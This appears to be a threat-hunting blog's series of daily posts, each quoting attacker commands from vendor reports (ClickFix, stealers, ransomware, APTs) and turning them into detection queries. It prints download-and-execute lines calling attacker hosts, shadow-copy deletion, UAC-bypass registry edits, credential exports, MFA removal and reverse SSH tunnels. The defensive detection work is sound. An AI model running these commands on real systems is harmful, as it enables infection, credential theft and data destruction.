Know Your Adversary

Hello everyone! Masquerading (T1036) - a very common technique we see daily. Sometimes it's boring, sometimes it's not. But let's look at a curious case. Kaspersky released a report on how adversaries abuse GitHub and social media to deliver Cobalt Strike Beacons. The threat actors distributed RAR archives with multiple files inside. The victim should run an LNK file to start the infection process. The following command is executed: %cd% /c echo F | xcopy /h /y %cd%\Требования\Требования %public%\Downloads\ & start %cd%\Требования & ren %public%\Downloads\Company.pdf nau.exe & ren %public%\Downloads\Requirements.pdf BugSplatRc64.dll & %public%\Downloads\nau.exe And here we have a few detection opportunities. The first one - abusing xcopy to copy files to %PUBLIC% : event_type: "processcreatewin" AND proc_file_path: "xcopy.exe" AND cmdline: "public" The second - using ren to rename a PDF file into an EXE: event_type: "proc...

Hello everyone! What's the first thing you think about hearing about defeating system recovery? Ransomware? Sure, but it's not the only case. And you can transform it into a detection opportunity! Elastic Security Labs presented a report on  NOVABLIGHT - a NodeJS infostealer. It has a lot of features, but we're going to look at those related to defeating system recovery. For example, the stealer disables the Windows Recovery Environment ( reagentc /disable ) and deletes all Volume Shadow Copies ( vssadmin delete shadows /all ). And here we have two detection opportunities, disabling WRE: event_type: "processcreatewin" AND proc_file_path: "reagentc.exe" AND cmdline: "disable" And deleting WSC: event_type: "processcreatewin" AND proc_file_path: "vssadmin.exe" AND cmdline: ("delete" AND "shadows") See you tomorrow!

Hello everyone! Threat actors have different views on Windows Task Manager. Some of them love it. For example, it can be used to dump LSASS and extract credentials. Others don't like it, and try to disable it. For example, SHUYAL stealer. In general, it's quite common stealer, but behavior marker related to Task Manager seemed interesting to me. The malware modifies the following registry key to disable it: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr And it provides a detection opportunity for us: event_type: "registryvaluesetwin" AND reg_key_path: "DisableTaskMgr" See you tomorrow!

Hello everyone! Zero days without ClickFix. This time an adversary leveraged this technique to deploy  Epsilon Red ransomware. This time the "verification" process was a bit unusual. A victim needed to save copied data as an HTA file, execute it, get the code and paste it to another window. First, the file executes a command to download and execute an Epsilon Red payload: cmd /c cd /D %userprofile% && curl -s -o a.exe hxxp://155.94.155[.]227:2269/dw/vir.exe && a.exe Next, it provides the "code": cmd /c echo Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4 && pause And here we have an interesting detection opportunity: event_type: "processcreatewin" AND proc_file_path: "cmd.exe" AND cmdline: ("echo" AND "verificatification code") See you tomorrow!

Hello everyone! You think that ClickFix technique is used only to attack Windows-based systems? It's not true. The adversaries also use it to attack macOS! Hunt.io shared a report on a recent phishing campaing targeting macOS users. The adversary leveraged fake CAPTCHA to trick victims to run Terminal commands. According to the report, the pasted command typically starts with: echo 'BASE64_ENCODED_PAYLOAD' | base64 -d | bash So, we can use it to build a query for our hunting mission: event_type: "processcreatemac" AND cmdline: ("echo" AND "base64" AND "bash") The command runs a hidden script that can steal crypto wallets, cookies, and sensitive files. See you tomorrow!

Hello everyone! Let's look at how adversaries leverage the following technique - System Script Proxy Execution (T1216). But we need an example, of course. And we have it! Dropping Elephant campaign againts Turkish defense contractors described by Arctic Wolf. Once again the threat actors used malicious LNK files. And this time they abused Pester.bat to execute malicious PowerShell commands: "C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat" ;powershell s''l''eep 1;$ProgressPreference = 'SilentlyContinue';$a='https:';$b='C:\Users\';$c='C:\Windows\';wg''et $a//expouav[.]org/download/fetch/list3/12717/view/0d5a0411-0a85-42cf-928c-dd9218019f3b -OutFile $b\Public\Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf;s''ap''s "$b\Public\Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf";wg''et $a//expouav[.]org/download/fetch/list7/40275/view/e49c7ae0...

Hello everyone! Adversary may use hidden accounts to access a compromised infrastructure. Such accounts won't be displayed on Welcome or login screen, but still can be used, for example, to log in using Remote Desktop Protocol (RDP). To hide a user account from the Windows login screen, a threat actor may modify registry. For example, here's how Chaos ransomware gang does it: cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist /v $user_account /t REG_DWORD /d 0 /f   And yes, we can hunt for similar registry modification events: event_type: "processcreatewin" AND proc_file_path: "reg.exe" AND cmdline: ("add" AND "Winlogon\\SpecialAccounts\\Userlist") See you tomorrow!

Hello everyone! Finally, an interesting case of LLM abuse! I'm talking about LameHug . The malware relies on the Hugging Face API to generate commands according to given prompts. For example, the malware used LLM to generate reconnaissance and data theft commands. LameHug is distributed vis phishing emails. Attached archives contain PIF files, for example.  So, we can check for any PIF files resolving Hugging Face related domains: event_type: "dnsreqwin" AND dns_rname: *huggingface* AND proc_file_path: *pif Also a good idea would be to profile communications with Hugging Face API to exclude known-good and be able to detect suspicious events. See you tomorrow! 

Hello everyone! Another legitimate tool abused by the ransomware gangs - AzCopy . According to this cybersecurity advisory, Interlock ransomware gang used the tool for data exfiltration. The tool allows an the adversary to copy files from compromised systems to a remote Azure storage. As the tool is legitimate, it's another great target for hunting, for example: event_type: "processcreatewin" AND proc_file_path: "azcopy.exe" Talking about Interlock, it's worth noting another tool in their arsenal we discussed earlier - Interlock RAT. See you tomorrow!

Hello everyone! We already talked about staging folders and how to use such information for threat hunting. Let's look at another example! This time - APT41 (we track this cluster as Wanted Werewolf ). According to this report by Kaspersky, the adversary leveraged the following folders to store the toolset: c:\windows\tasks\ c:\programdata\ c:\programdata\usoshared\ c:\users\public\downloads\ c:\users\public\ c:\windows\help\help\ c:\users\public\videos\ Some are quite common, while others are great targets for your threat hunting mission, for example: event_type: "processcreatewin" AND proc_file_path: ("windows\\tasks" OR "programdata\\usoshared" OR "windows\\help\\help" OR "users\\public\\videos") See you tomorrow!

Hello everyone! Stealers again! This time we're going to talk about  Fickle Stealer an an interesting delivery method leveraged by the threat actors. So, the adversary used maclious LNK files to misuse a script for managing BitLocker (manage-bde.wsf) to download and execute a PowerShell script: "C:\Windows\System32\manage-bde.wsf" & powershell -nop -w hidden -c iex(iwr hxxps://bitacid[.]net/payload/callback.ps1) & " The script is executed via wscript.exe, so we can build our detection logic on suspicious command line parameters: event_type: "processcreatewin" AND proc_file_path: "wscript.exe" AND cmdline: ("manage-bde" AND "powershell" AND "hidden") See you tomorrow!

Hello everyone! Let's look at another LOLBIN commonly misused by adversaries. This time we're going to talk about Microsoft CAB File Extract Utility and Lumma Stealer - a very common modern threat. Despite the fact Microsoft CAB File Extract Utility should be used to extract files with .cab extension, you can use any, for example, .mp4 . That's what the adversary does (in fact, this behavior is related to CypherIT crypter), for example: extrac32 /Y Ultimate.ppt *.* extrac32 /Y Championships.sldm *.* extrac32 /Y Worm.potm *.* extrac32 /Y Stainless.mid *.* extrac32 /Y Combinations.psd *.* So, from detection and hunting perspective, we can search for extrac32 execution events, which don't have .cab files in the command line: event_type: "processcreatewin" AND proc_file_path: "extrac32.exe" AND NOT cmdline: *cab* See you tomorrow!

Hello everyone! It's not a secret that in some cases a network can be already compromised. And in some cases by threat actors with the same goal. What are new unwanted guests going to do? Yes, eliminate the competitors! Today we're going to talk about another very common threat - miners. One may say it's not a real threat, but beleive me, I saw cases where the whole enterprise was disrupted due to such infection. So, let's look at Kinsing  (we track this activity cluster as Resourceful Wolf ). It abuses pkill to terminate a list of processes related to other cryptominers, for example: pkill -f .git/kthreaddw pkill -f 80.211.206.105 pkill -f 207.38.87.6 pkill -f p8444 pkill -f supportxmr pkill -f monero pkill -f kthreaddi pkill -f srv00 pkill -f /tmp/.javae/javae pkill -f .javae pkill -f .syna pkill -f xmm pkill -f solr.sh pkill -f /tmp/.solr/solrd pkill -f /tmp/javac pkill -f /tmp/.go.sh pkill -f /tmp/.x/agetty pkill -f /tmp/.x/kworker pkill -f c3pool pkill -f /tmp/.X11...

Hello everyone! Stealers. I'm sure, you see this threat every day! And it's EXTREMELY noisy as it extracts lots of sensitive data from a compromised system. Let's look at another example of how adversaries leverage the following technique:  Unsecured Credentials: Credentials in Registry (T1552.002) . So, we're going to look at Katz Stealer . Here's how it abuses reg.exe to extract authentication material for FFFTP and WinSCP: cmd.exe /c reg export "HKCU\Software\Sota\FFFTP" "%LOCALAPPDATA%\FFFTP_registry.reg" /y cmd.exe /c reg export "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions" "%LOCALAPPDATA%\WinSCP_registry.reg" /y As always, we can transform it into a detection query: event_type: "processcreatewin" AND proc_file_path: "reg.exe" AND cmdline: ("export" AND ("FFFTP" OR "WinSCP")) See you tomorrow!

Hello everyone! More and more organizations use multi-factor authentication. And threat actors don't like it! For example, ransomware gangs. Let's look into Cisco Talos report . The adverary leveraged simple yet effective technique - just uninstalled Duo from the compromised host: C:\WINDOWS\system32\cmd.EXE, /c, wmic, product, where, name=Duo Authentication for Windows Logon x64, call, uninstall, /nointeractive: And yes, this is another interesting behavior to hunt for: event_type: "processcreatewin" AND cmdline: ("duo authentication" AND "uninstall") Of course, you can experiment with other two-factor authentication applications. See you tomorrow!

Hello everyone! Let's keep talking about C2 communications. And this time we'll look at an activity cluster we track as Rainbow Hyena (it's also known as Head Mare). Let's look at the following part of the report: After collecting initial information about the compromised system, the backdoor establishes a connection with the C2 server. The communication is carried out over HTTP, using GET and POST requests. The malware generates a GET request and accesses a URL in the following format: 91.239.148[.]21/poll?id=&hostname=&domain= As you can see, there's a certain pattern we can use for hunting even if we don't know the IP address of the server. Let's look at another example . It the same group, but the pattern is different: hxxp://195.58.54[.]39:80/connect hxxp://195.58.54[.]39/check hxxp://195.58.54[.]39/command hxxp://195.58.54[.]39/init And this is another thing you should notice, document and use for threat hunting, both internal and external. Se...

Hello everyone! Adversaries always experiment with C2 channels to evade defenses. And often abuse legitimate services, as you know. Let's look at another interesting example. Unit42 has published a report  on activity cluster CL-STA-1020 . The adversary leveraged quite common technique, DLL sideloading, to deploy the HazyBeacon backdoor. But at the same time, the threat actors chose a very interesting C2 channel - AWS Lambda URLs . Of course, these URLs may be a part of absolutely legitimate activity, but we still can hunt for suspicious processes communicating with it, excluding known good, of course. For example: dns_rname.keyword:/.*lambda-url.*/ AND NOT proc_file_path: ("svchost.exe" OR "networkservice.exe" OR "msmpeng.exe") Exclusion list may be different - it depend on your infrastructure! See you tomorrow!

Hello everyone! The DFIR Report has published a report on  Interlock RAT . The adversary used KongTuke and FileFix technique to deliver it to the target system. The victim copies and pastes the following command: "powershell.exe" -ep Bypass -w H -c "schtasks /delete /tn Updater /f; $w=New-Object System.Net.WebClient ; $w.Headers.Add(\"User-Agent\", \"PowerShell\") ; $w.DownloadString(\"hXXp://deadly-programming-attorneys-our[.]trycloudflare[.]com\") | iex" Nothing interesting, right? But it spawns an interesting command abusing php.exe: "C:\Users\REDACTED\AppData\Roaming\php\php.exe" -d extension=zip -d extension_dir=ext C:\Users\\AppData\Roaming\php\wefs.cfg 1 Here we can search for PowerShell spawning php.exe from uncommon locations: event_type: "processcreatewin" AND proc_p_file_path: "powershell.exe" AND proc_file_path: ("appdata" AND "php.exe") The adversary used Interlock RAT to ...

Hello everyone! I'm sure many of you consumer or even produce intelligence related to the Darknet. Initial access brokers, sold databases, stealer logs for sale... But what about threat hunting? Can we get valuable intelligence and transform it to a hypothesis for threat hunting? Yes, we can! Let's look at an example. Recently a threat actor with moniker " tainted_l0ve " advertised a new ClickFix delivery method: My attention caught the follwing part: "on delivery, command is automatically deleted from user "Run" history". If you ever did digital forensics, you must know that RunMRU (Most Recently Used) is a Windows registry key that stores a list of the last 26 commands entered in the Run dialog (Win + R). And it means the tool most likely clear this key, so we can use it for hunting: event_type: "registryobjdelete" AND reg_key_path: "runmru" See you tomorrow!

Hello everyone! Modern ransomware attack lifecycle almost always includes data collection and exfiltration stage. Some gangs don't even deploy ransomware, they just exfiltrate sensitive data and use it for extortion.  What's more. The threat actors often use absolutely legitimate tools! Let's look at an example . SafePay ransomware. According to the report, the adversary leveraged WinRAR for collection: WinRAR.exe  a -v5g -ed -r -tn1000d -m0 -mt5 -x*.rar -x*.JPEG -x*.RAW -x*.PSD -x*.TIFF -x*.BMP -x*.GIF -x*.JPG -x*.MOV -x*.pst -x*.FIT -x*.FIL -x*.mp4 -x*.avi -x*.mov -x*.mdb -x*.iso -x*.exe -x*.dll -x*.bak -x*.msg -x*.png -x*.zip -x*.ai -x*.7z -x*.DPM -x*.log -x*.dxf -x*.insp -x*.upd -x*.db -x*.dwg -x*.nc1 -x*.metadata -x*.dg -x*.inp -x*.dat -x*.TIFF -x*.tiger -x*.pcp -x*.rvt -x*.rws -x*.nwc -x*.tif -x*.frx -x*.dyf -x*.rcs -x*.diff C:\[redacted].rar \\[redacted]\C$\Users\ It's interesting that in this case the adversary desided to exclude not interesting files, for examp...

Hello everyone! As it's Friday, let's look at a funny case, at least in my opinion. And it's one more time about masquerading. The case itself is related to exploiting public facing applications and deploying coinminers. Nothing special. But there're a few interesting behaviors! The adversary downloads NetCat from a remote server: (New-Object Net.WebClient).DownloadFile('hXXp://212.78.4[.]241:8081/docs/nc.exe', 'C:\programdata\userinit.exe') As you can see, the threat actors masquaraded NetCat to look like a legitimate process, bu at the same time copied and renamed cmd.exe : cmd c/ copy C:\Windows\System32\cmd.exe C:\ProgramData\c.exe So, once again we are dealing with renamed command and scripting interpreters: event_type: "processcreatewin" AND proc_file_originalfilename: "cmd.exe" AND NOT proc_file_name: "cmd.exe" And also command and scripting interpreters in uncommon locations: event_type: "processcreatewin"...

Hello everyone! I'm sure, you saw cases where adversaries really wanted the defenders to catch them. Yes, in some cases they may call the payload malware.exe or... Let's look at the example I spotted today: You got it right. The filename is payload.exe. That's it. So, why not to hunt for such suspicious filenames? For example: event_type: "processcreatewin" AND proc_file_path: "payload" Another interesting example - PDB paths. In some cases , they may be REALLY suspicious, for example: Y:\Hack\backdoor\3-exe-attack\temp\UAC_Elevated\win32\UAC_Elevated.pdb So, if your EDR solution supports collecting PDB paths, you can also use it for detection and hunting: event_type: "processcreatewin" AND proc_file_pdb_path: ("payload" OR "hack" OR "backdoor" OR "attack" OR "bypass" OR "dropper" OR "exploit" OR "keylog" OR "trojan" OR "spy") See you tomorrow!

Hello everyone! Today I want to look at another stealer -  NordDragonScan . Once again, the adversary uses a malicious LNK file to download an HTA - a very common behavior. But it's not the thing that caught my attention, it's the following: "The malicious HTA file copies the legitimate PowerShell.exe binary to the path “C:\Users\Public\Documents\install.exe” to mask itself" So, here we have a renamed PowerShell.exe binary, and also quite suspicious staging folder - looks like the adversary made things even noisier! We already talked about renamed system binaries, and here's another example: event_type: "processcreatewin" AND proc_file_originalfilename: "powershell.exe" AND NOT proc_file_name: "powershell.exe" And also another suspicious staging folder: event_type: "processcreatewin" AND proc_file_path: "Public\\Documents" See you tomorrow!

Hello everyone! There're quite a few well-known ways to bypass the User Account Control (UAC). Some are often used in-the-wild, some are not. Let's look at a recent example from Kaspersky report on Batavia spyware. The adversary abused  ComputerDefaults.exe to bypass UAC. To do it, the threat actor modified two registry keys using reg.exe : reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /f /ve /t REG_SZ /d "%temp%\windowsmsg.exe <arg>" It means we can hunt for related registry keys modification events: event_type: "registryvaluesetwin" AND reg_key_path: "ms-settings\\shell\\open\\command" Also, check for suspicious processes spawned as a child process of  ComputerDefaults.exe : event_type: "processcreatewin" AND proc_p_file_path: "computerdefaults.exe" See you tomorrow!

Hello everyone! We already talked about Console Window Host ( conhost.exe ) abuse. Usually threat actors used it with the " --headless " flag to hide the windows from the user upon execution. Unit42 conducted a research on malicious LNK files, and guess what? Yes, Console Window Host is among most often used system targets: powershell.exe cmd.exe rundll32.exe conhost.exe wscript.exe forfiles.exe mshta.exe What does it mean? It definitely worth a hunting query: event_type: "processcreatewin" AND proc_file_name: "conhost.exe" AND cmdline: "headless" See you tomorrow!

Hello everyone! If you checked the report I shared yesterday, you should have noticed another interesting legitimate tool abused by Scattered Spider - Teleport. The adversary installed it to on compromised servers to establish a persistent remote command-and-control (C2) channel. We can start from hunting for downloading Teleport binaries, for example: event_type: "processcreatenix" AND proc_file_name: "curl" AND cmdline: "teleport.dev" Also, you may look for Teleport configuration file modification events: event_type: "filewrite" AND file_path: "teleport.yaml" See you tomorrow!

Hello everyone! Have you read recent CrowdStrike's report on  SCATTERED SPIDER activity? If not, make sure you have! It contains lots of valuable information on adversary's tactics, techniques and procedures. One of them - abusing Pinggy - another privacy-focused tunneling solution. It's interesting that threat actors don't even have to drop its binary to the compromised system, they can use just ssh , for example: ssh -p 443 -R0:127.0.0.1:3389 -o StrictHostKeyChecking=no -o ServerAliveInterval=30 4FohZ817ZPe+tcp@a.pinggy.io So, the first thing to hunt for is "pinggy" in the command line: event_type: "processcreatewin" AND cmdline: "pinggy" Another opportunity is hunting for Pinggy-related domains: event_type: "dnsreq" AND dns_rname: ("pinggy.io" OR "pinggy.link") See you tomorrow!

Hello everyone! Today we're going to talk about some basics. But such basics are extremely important to document and use. I'm talking about process parent and children relationships. The thing is, some processes may rarely or never spawn some other processes in a legitimate way. So if you see such behaviour marker, it's most likely related to malicious activity. But the problem is - there can be many and many variants of such markers. Let's look at an example , which belongs to Kimsuky . It's a malicious VBS file. If we look at it closely, we can see that in this case wscript.exe spawns curl.exe to download another malicious file. And this is an example of behavior marker we can use for detection or hunting: event_type: "processcreatewin" AND proc_p_file_path: "wscript.exe" AND proc_file_path: "curl.exe" And yes, as I mentioned before, there can be many variants of such behaviour markers, so make sure to document it! See you tomorrow!

Hello everyone! RMMs. Yes, again. This one isn't new, but I don't see it often enough, so I decided some detection and hunting ideas for it. I'm talking about Level RMM. According to this report , the adversary leveraged PowerShell to download the installer: powershell $env:LEVEL_API_KEY = <API Key>; Set-ExecutionPolicy RemoteSigned -Scope Process -Force; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $tempFile = Join-Path ([System.IO.Path]::GetTempPath()) "install_windows.exe"; Invoke-WebRequest -Uri "hxxps://downloads[.]level[.]io/install_windows.exe" -OutFile $tempFile; The executable is signed by Level Software, Inc. Why not to use it for detection? event_type: "processcreatewin" AND proc_file_sig: "Level Software" Another detection opportunity is searching for Level RMM-related domains: event_type: "dnsreqwin" AND dns_rname: ("level.io" OR "rmm.dev") See you to...

Hello everyone! Adversaries often use multiple stages to deliver final payload or, for example, some tools. In some cases they use very special folders, and we can use such paths in our threat hunting missions. Want an example? Sure! Let's look at this DCRAT campaign . According to the report, the adversary downloaded the final payload to  C:\Users\Public\Downloads . Quite interesting folder, isn't it? Yes, we can build a hunting query using this information: event_type: "processcreatewin" AND proc_file_path: "Public\\Downloads" Do you know any interesting staging folders? See you tomorrow!

Hello everyone! We've talked a lot about abusing legitimate services for C2 channel. Let's look at another example worth a hunting query! According to this report , the adversary leveraged malicious Word documents to deliver a Havoc Demon. An interesting thing here is that the threat actor decided to use Microsoft dev tunnels for C2.  Dev tunnels allow developers to share local web services across the internet securely. As you can see, not only developers. In this case the following domain was used:  hxxp://djlmwd9b-80.euw.devtunnels[.]ms . And we can use it to build a query: event_type: "dnsreqwin" AND dns_rname: "devtunnels.ms" Other domains to consider: app.github.dev tunnels-prod-rel-tm.trafficmanager.net global.rel.tunnels.api.visualstudio.com See you tomorrow!